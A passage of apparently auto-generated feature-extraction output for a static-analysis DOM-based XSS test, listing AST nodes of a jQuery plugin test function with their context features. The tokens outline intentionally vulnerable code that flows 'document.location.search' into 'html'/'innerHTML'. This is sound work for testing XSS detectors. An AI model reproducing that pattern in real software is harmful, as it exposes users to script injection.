element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:353:6:353:15 | pluginName | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:353:6:353:15 | pluginName | enclosingFunctionBody | pluginName myFancyJQueryPlugin myPlugin target document location search html target innerHTML target each i e innerHTML target html target e innerHTML target $ fn pluginName myPlugin | +| autogenerated/Xss/DomBasedXss/tst.js:353:6:353:15 | pluginName | enclosingFunctionName | thisNodes | +| autogenerated/Xss/DomBasedXss/tst.js:353:6:353:15 | pluginName | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:353:6:353:39 | pluginN ... Plugin" | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:353:6:353:39 | pluginN ... Plugin" | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:353:6:353:39 | pluginN ... Plugin" | enclosingFunctionBody | pluginName myFancyJQueryPlugin myPlugin target document location search html target innerHTML target each i e innerHTML target html target e innerHTML target $ fn pluginName myPlugin | +| autogenerated/Xss/DomBasedXss/tst.js:353:6:353:39 | pluginN ... Plugin" | enclosingFunctionName | thisNodes | +| autogenerated/Xss/DomBasedXss/tst.js:353:6:353:39 | pluginN ... Plugin" | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:353:6:353:39 | pluginName | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:353:6:353:39 | pluginName | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:353:6:353:39 | pluginName | enclosingFunctionBody | pluginName myFancyJQueryPlugin myPlugin target document location search html target innerHTML target each i e innerHTML target html target e innerHTML target $ fn pluginName myPlugin | +| autogenerated/Xss/DomBasedXss/tst.js:353:6:353:39 | pluginName | enclosingFunctionName | thisNodes | +| autogenerated/Xss/DomBasedXss/tst.js:353:6:353:39 | pluginName | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:353:19:353:39 | "myFanc ... Plugin" | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:353:19:353:39 | "myFanc ... Plugin" | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:353:19:353:39 | "myFanc ... Plugin" | enclosingFunctionBody | pluginName myFancyJQueryPlugin myPlugin target document location search html target innerHTML target each i e innerHTML target html target e innerHTML target $ fn pluginName myPlugin | +| autogenerated/Xss/DomBasedXss/tst.js:353:19:353:39 | "myFanc ... Plugin" | enclosingFunctionName | thisNodes | +| autogenerated/Xss/DomBasedXss/tst.js:353:19:353:39 | "myFanc ... Plugin" | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:354:6:354:13 | myPlugin | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:354:6:354:13 | myPlugin | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:354:6:354:13 | myPlugin | enclosingFunctionBody | pluginName myFancyJQueryPlugin myPlugin target document location search html target innerHTML target each i e innerHTML target html target e innerHTML target $ fn pluginName myPlugin | +| autogenerated/Xss/DomBasedXss/tst.js:354:6:354:13 | myPlugin | enclosingFunctionName | thisNodes | +| autogenerated/Xss/DomBasedXss/tst.js:354:6:354:13 | myPlugin | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:354:6:365:2 | myPlugi ... \\t});\\n\\t} | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:354:6:365:2 | myPlugi ... \\t});\\n\\t} | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:354:6:365:2 | myPlugi ... \\t});\\n\\t} | enclosingFunctionBody | pluginName myFancyJQueryPlugin myPlugin target document location search html target innerHTML target each i e innerHTML target html target e innerHTML target $ fn pluginName myPlugin | +| autogenerated/Xss/DomBasedXss/tst.js:354:6:365:2 | myPlugi ... \\t});\\n\\t} | enclosingFunctionName | thisNodes | +| autogenerated/Xss/DomBasedXss/tst.js:354:6:365:2 | myPlugi ... \\t});\\n\\t} | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:354:6:365:2 | myPlugin | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:354:6:365:2 | myPlugin | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:354:6:365:2 | myPlugin | enclosingFunctionBody | pluginName myFancyJQueryPlugin myPlugin target document location search html target innerHTML target each i e innerHTML target html target e innerHTML target $ fn pluginName myPlugin | +| autogenerated/Xss/DomBasedXss/tst.js:354:6:365:2 | myPlugin | enclosingFunctionName | thisNodes | +| autogenerated/Xss/DomBasedXss/tst.js:354:6:365:2 | myPlugin | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:354:17:354:16 | this | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:354:17:354:16 | this | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:354:17:354:16 | this | enclosingFunctionBody | pluginName myFancyJQueryPlugin myPlugin target document location search html target innerHTML target each i e innerHTML target html target e innerHTML target $ fn pluginName myPlugin | +| autogenerated/Xss/DomBasedXss/tst.js:354:17:354:16 | this | enclosingFunctionName | thisNodes | +| autogenerated/Xss/DomBasedXss/tst.js:354:17:354:16 | this | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:354:17:354:17 | target | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:354:17:354:17 | target | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:354:17:354:17 | target | enclosingFunctionBody | pluginName myFancyJQueryPlugin myPlugin target document location search html target innerHTML target each i e innerHTML target html target e innerHTML target $ fn pluginName myPlugin | +| autogenerated/Xss/DomBasedXss/tst.js:354:17:354:17 | target | enclosingFunctionName | thisNodes | +| autogenerated/Xss/DomBasedXss/tst.js:354:17:354:17 | target | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:354:17:365:2 | 'arguments' object of function myPlugin | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:354:17:365:2 | 'arguments' object of function myPlugin | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:354:17:365:2 | 'arguments' object of function myPlugin | enclosingFunctionBody | pluginName myFancyJQueryPlugin myPlugin target document location search html target innerHTML target each i e innerHTML target html target e innerHTML target $ fn pluginName myPlugin | +| autogenerated/Xss/DomBasedXss/tst.js:354:17:365:2 | 'arguments' object of function myPlugin | enclosingFunctionName | thisNodes | +| autogenerated/Xss/DomBasedXss/tst.js:354:17:365:2 | 'arguments' object of function myPlugin | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:354:17:365:2 | exceptional return of function myPlugin | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:354:17:365:2 | exceptional return of function myPlugin | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:354:17:365:2 | exceptional return of function myPlugin | enclosingFunctionBody | pluginName myFancyJQueryPlugin myPlugin target document location search html target innerHTML target each i e innerHTML target html target e innerHTML target $ fn pluginName myPlugin | +| autogenerated/Xss/DomBasedXss/tst.js:354:17:365:2 | exceptional return of function myPlugin | enclosingFunctionName | thisNodes | +| autogenerated/Xss/DomBasedXss/tst.js:354:17:365:2 | exceptional return of function myPlugin | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:354:17:365:2 | functio ... \\t});\\n\\t} | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:354:17:365:2 | functio ... \\t});\\n\\t} | contextSurroundingFunctionParameters | ()\n() | +| autogenerated/Xss/DomBasedXss/tst.js:354:17:365:2 | functio ... \\t});\\n\\t} | enclosingFunctionBody | pluginName myFancyJQueryPlugin myPlugin target document location search html target innerHTML target each i e innerHTML target html target e innerHTML target $ fn pluginName myPlugin | +| autogenerated/Xss/DomBasedXss/tst.js:354:17:365:2 | functio ... \\t});\\n\\t} | enclosingFunctionName | thisNodes | +| autogenerated/Xss/DomBasedXss/tst.js:354:17:365:2 | functio ... \\t});\\n\\t} | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:354:17:365:2 | return of function myPlugin | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:354:17:365:2 | return of function myPlugin | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:354:17:365:2 | return of function myPlugin | enclosingFunctionBody | pluginName myFancyJQueryPlugin myPlugin target document location search html target innerHTML target each i e innerHTML target html target e innerHTML target $ fn pluginName myPlugin | +| autogenerated/Xss/DomBasedXss/tst.js:354:17:365:2 | return of function myPlugin | enclosingFunctionName | thisNodes | +| autogenerated/Xss/DomBasedXss/tst.js:354:17:365:2 | return of function myPlugin | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:355:10:355:15 | target | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:355:10:355:15 | target | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:355:10:355:15 | target | contextSurroundingFunctionParameters | ()\n() | +| autogenerated/Xss/DomBasedXss/tst.js:355:10:355:15 | target | enclosingFunctionBody | pluginName myFancyJQueryPlugin myPlugin target document location search html target innerHTML target each i e innerHTML target html target e innerHTML target $ fn pluginName myPlugin | +| autogenerated/Xss/DomBasedXss/tst.js:355:10:355:15 | target | enclosingFunctionBody | pluginName myFancyJQueryPlugin myPlugin target document location search html target innerHTML target each i e innerHTML target html target e innerHTML target $ fn pluginName myPlugin | +| autogenerated/Xss/DomBasedXss/tst.js:355:10:355:15 | target | enclosingFunctionName | thisNodes | +| autogenerated/Xss/DomBasedXss/tst.js:355:10:355:15 | target | enclosingFunctionName | thisNodes | +| autogenerated/Xss/DomBasedXss/tst.js:355:10:355:15 | target | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:355:10:355:42 | target | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:355:10:355:42 | target | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:355:10:355:42 | target | enclosingFunctionBody | pluginName myFancyJQueryPlugin myPlugin target document location search html target innerHTML target each i e innerHTML target html target e innerHTML target $ fn pluginName myPlugin | +| autogenerated/Xss/DomBasedXss/tst.js:355:10:355:42 | target | enclosingFunctionName | thisNodes | +| autogenerated/Xss/DomBasedXss/tst.js:355:10:355:42 | target | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:355:10:355:42 | target ... .search | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:355:10:355:42 | target ... .search | contextSurroundingFunctionParameters | ()\n() | +| autogenerated/Xss/DomBasedXss/tst.js:355:10:355:42 | target ... .search | enclosingFunctionBody | pluginName myFancyJQueryPlugin myPlugin target document location search html target innerHTML target each i e innerHTML target html target e innerHTML target $ fn pluginName myPlugin | +| autogenerated/Xss/DomBasedXss/tst.js:355:10:355:42 | target ... .search | enclosingFunctionName | thisNodes | +| autogenerated/Xss/DomBasedXss/tst.js:355:10:355:42 | target ... .search | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:355:19:355:26 | document | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:355:19:355:26 | document | contextSurroundingFunctionParameters | ()\n() | +| autogenerated/Xss/DomBasedXss/tst.js:355:19:355:26 | document | enclosingFunctionBody | pluginName myFancyJQueryPlugin myPlugin target document location search html target innerHTML target each i e innerHTML target html target e innerHTML target $ fn pluginName myPlugin | +| autogenerated/Xss/DomBasedXss/tst.js:355:19:355:26 | document | enclosingFunctionName | thisNodes | +| autogenerated/Xss/DomBasedXss/tst.js:355:19:355:26 | document | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:355:19:355:35 | document.location | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:355:19:355:35 | document.location | contextSurroundingFunctionParameters | ()\n() | +| autogenerated/Xss/DomBasedXss/tst.js:355:19:355:35 | document.location | enclosingFunctionBody | pluginName myFancyJQueryPlugin myPlugin target document location search html target innerHTML target each i e innerHTML target html target e innerHTML target $ fn pluginName myPlugin | +| autogenerated/Xss/DomBasedXss/tst.js:355:19:355:35 | document.location | enclosingFunctionName | thisNodes | +| autogenerated/Xss/DomBasedXss/tst.js:355:19:355:35 | document.location | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:355:19:355:42 | documen ... .search | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:355:19:355:42 | documen ... .search | contextSurroundingFunctionParameters | ()\n() | +| autogenerated/Xss/DomBasedXss/tst.js:355:19:355:42 | documen ... .search | enclosingFunctionBody | pluginName myFancyJQueryPlugin myPlugin target document location search html target innerHTML target each i e innerHTML target html target e innerHTML target $ fn pluginName myPlugin | +| autogenerated/Xss/DomBasedXss/tst.js:355:19:355:42 | documen ... .search | enclosingFunctionName | thisNodes | +| autogenerated/Xss/DomBasedXss/tst.js:355:19:355:42 | documen ... .search | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:355:28:355:35 | location | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:355:28:355:35 | location | contextSurroundingFunctionParameters | ()\n() | +| autogenerated/Xss/DomBasedXss/tst.js:355:28:355:35 | location | enclosingFunctionBody | pluginName myFancyJQueryPlugin myPlugin target document location search html target innerHTML target each i e innerHTML target html target e innerHTML target $ fn pluginName myPlugin | +| autogenerated/Xss/DomBasedXss/tst.js:355:28:355:35 | location | enclosingFunctionName | thisNodes | +| autogenerated/Xss/DomBasedXss/tst.js:355:28:355:35 | location | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:355:37:355:42 | search | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:355:37:355:42 | search | contextSurroundingFunctionParameters | ()\n() | +| autogenerated/Xss/DomBasedXss/tst.js:355:37:355:42 | search | enclosingFunctionBody | pluginName myFancyJQueryPlugin myPlugin target document location search html target innerHTML target each i e innerHTML target html target e innerHTML target $ fn pluginName myPlugin | +| autogenerated/Xss/DomBasedXss/tst.js:355:37:355:42 | search | enclosingFunctionName | thisNodes | +| autogenerated/Xss/DomBasedXss/tst.js:355:37:355:42 | search | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:356:6:356:9 | this | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:356:6:356:9 | this | contextSurroundingFunctionParameters | ()\n() | +| autogenerated/Xss/DomBasedXss/tst.js:356:6:356:9 | this | enclosingFunctionBody | pluginName myFancyJQueryPlugin myPlugin target 